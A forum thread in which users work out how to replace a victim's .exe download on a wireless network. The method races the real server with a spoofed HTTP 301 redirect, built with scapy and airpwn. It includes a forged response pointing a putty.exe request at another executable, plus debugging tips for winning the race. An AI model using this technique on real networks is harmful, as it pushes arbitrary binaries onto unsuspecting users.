replacing .exe on a broadcast network

[Cryptid]

does anyone have any knowledge regarding replacing .exe file request on a broadcast network by exploiting a race condition... from what i understand at the moment one can sniff network traffic and on finding the "content-type:application" as a request respond to it with his own binary file,,, i think this would be even more cool than using ettercap filters and injecting code on the fly into an html page....

if this is possible it can also lead to a whole new kind of injection attack in 802.11 network where an attacker can send data to the victim with out even being associated to the AP.

[Mithrilhall]

I believe this is called header injection.


h**p://rturf.net/documentum/?View=entry&EntryID=272

Another

h**p://i8jesus.com/?p=18

[Cryptid]

Thanks a lot,,, it looks like HTTP 301 response is the best thing to do i have even seen an ettercap filter doing the same... will try to implement this using scapy on a wifi network,,, now must sit and start reading up on TCP to understand how the sequence number and ack numbers works and how the checksum is calculated...


there is another way of accomplishing this,,, we can write a customised tcp stack which should race and respond to the GET request,, but the problem is this might become too complicated since i am trying to do using packet injection for a 802.11 network with out being associated to the AP.& i dunno how to handle and send executable files in packets... although i would like to learn about it anybody who could put some light on this topic or point me to some interesting article would be great... any suggestions or alternative way of doing this will also be greatly appreciated.

[wyze]

Quote:

Originally Posted by Cryptid

there is another way of accomplishing this,,, we can write a customised tcp stack which should race and respond to the GET request,, but the problem is this might become too complicated since i am trying to do using packet injection for a 802.11 network with out being associated to the AP.& i dunno how to handle and send executable files in packets... although i would like to learn about it anybody who could put some light on this topic or point me to some interesting article would be great... any suggestions or alternative way of doing this will also be greatly appreciated.

Wifitap, which uses scapy, might have some keys to the puzzle.

[Cryptid]

alright i have acheived some progress but im stuck again

when a get request is being made say

Code:

GET /~sgtatham/putty/latest/x86/putty.exe HTTP/1.1
Host: the.earth.li

i am repling back with a 301 response as such

Code:

HTTP/1.1 301 Moved Permanently
Location: http://spool.metasploit.com/releases/framework-3.2.exe

but the resultant is turning out to be a request made to

Code:

/releases/framework-3.2.exerth.li/~sgtatham/putty/latest/x86/putty.exe

can anyone point me out to what i am doing wrong.

[wyze]

What tool are you using to do this?

One thing Mister_X kindly shedded on light on was that airpwn _should_ actually be able to do this out of the box. Unfortunately, I've neve got airpwn to work right with mac80211 (even though it's "supported"). I'll try a test with my rt73 card soon and see if it will work in this scenario.

[Cryptid]

the problem was the 301 response had to end with a \r\n which was missing, therefore the problem occured now its working but there is another problem the race conditon is effectively being exploited only the first time since the first response being generated is inducing some amount of latency in the program all the other get request are being retrieved from a buffer which are already being serviced by the authentic source therefore no more race condition exists because the program becomes slow and looses the race... any help with the program will be appreciated greatly

at the moment the only solution i think to the problem is that somehow flush the buffer and start the sniffer again... or somehow get the sniffer to stop sniffing when the program is injecting the packet.


by the way i am using scapy.


even i faced the same problem with airpwn for sometime but later on figured out that running airodump using the "-c" on the same channel as the victime network gets airpwn to correctly inject the data.